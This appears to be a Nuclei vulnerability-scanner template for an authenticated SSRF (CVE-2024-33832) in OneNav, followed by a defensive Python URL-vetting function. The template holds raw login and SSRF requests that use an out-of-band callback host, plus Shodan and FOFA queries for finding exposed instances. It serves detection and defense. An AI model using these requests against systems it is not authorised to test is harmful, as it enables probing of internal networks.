Vulnerability Description
OneNav v0.9.35-20240318 is vulnerable to server-side request forgery (SSRF) via the url parameter in the get_link_info API. An attacker can force the server to make arbitrary requests, potentially accessing internal resources.
id: CVE-2024-33832

info:
  name: OneNav v0.9.35-20240318 - Server-Side Request Forgery (SSRF)
  author: ritikchaddha
  severity: medium
  description: |
    OneNav v0.9.35-20240318 is vulnerable to server-side request forgery (SSRF) via the url parameter in the get_link_info API. An attacker can force the server to make arbitrary requests, potentially accessing internal resources.
  reference:
    - https://github.com/Hebing123/cve/issues/39
    - https://nvd.nist.gov/vuln/detail/CVE-2024-33832
  classification:
    epss-score: 0.03512
    epss-percentile: 0.87173
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 6.5
    cve-id: CVE-2024-33832
    cwe-id: CWE-918
  metadata:
    max-request: 2
    product: onenav
    fofa-query: icon_hash="1111283449"
    shodan-query: http.favicon.hash:1111283449
  tags: cve,cve2024,ssrf,onenav,oast,authenticated

http:
  - raw:
      # Request 1: authenticate (the get_link_info API requires a session)
      - |
        POST /index.php?c=login&check=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        user={{username}}&password={{password}}
      # Request 2: submit an out-of-band URL in the url parameter
      - |
        POST /index.php?c=api&method=get_link_info HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        url=http://{{interactsh-url}}

    # All three matchers must hold; with the default (or), any JSON response would match
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - 'title":'
          - 'description":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"
# digest: 490a0046304402205da3e2ca7c4fb8d0a61d7bad53d1971fd3eb955a6007171f86c103b3be27c661022013c686c286a4826283cf53c59fbe675256fd4ed767e272f17a860b7005099f71:922c64590222798bb761d5b6d8e72950
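
A defensive check for the url parameter described above, as an added Python example that is not OneNav's code or part of the template: it resolves the host and refuses any target that is not a public unicast address. The function names and the injectable `resolver` argument are assumptions made for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def default_resolver(host):
    """Return every address (A and AAAA) the host resolves to."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return [info[4][0] for info in infos]


def is_public(ip_text):
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(ip_text.split("%")[0])  # drop any IPv6 zone id
    mapped = getattr(ip, "ipv4_mapped", None)
    if mapped is not None:  # judge ::ffff:a.b.c.d by its embedded IPv4 address
        ip = mapped
    return ip.is_global and not ip.is_multicast


def check_fetch_url(url, resolver=default_resolver):
    """Vet a user-supplied url value; return (ok, reason, pinned_ip)."""
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError:
        return False, "malformed url", None
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed", None
    if not host or parts.username or parts.password:
        return False, "missing host or embedded credentials", None
    try:
        addrs = resolver(host)
    except OSError:
        return False, "host does not resolve", None
    # Reject if ANY record is internal: a name may mix public and private answers.
    blocked = [a for a in addrs if not is_public(a)]
    if blocked or not addrs:
        return False, "resolves to non-public address", None
    # The caller should connect to this vetted IP instead of resolving again.
    return True, "ok", addrs[0]
```

The fetcher should connect to the returned `pinned_ip` (sending the original Host header) and run the same check on every redirect target, otherwise a second DNS lookup or a 302 response can still reach an internal address.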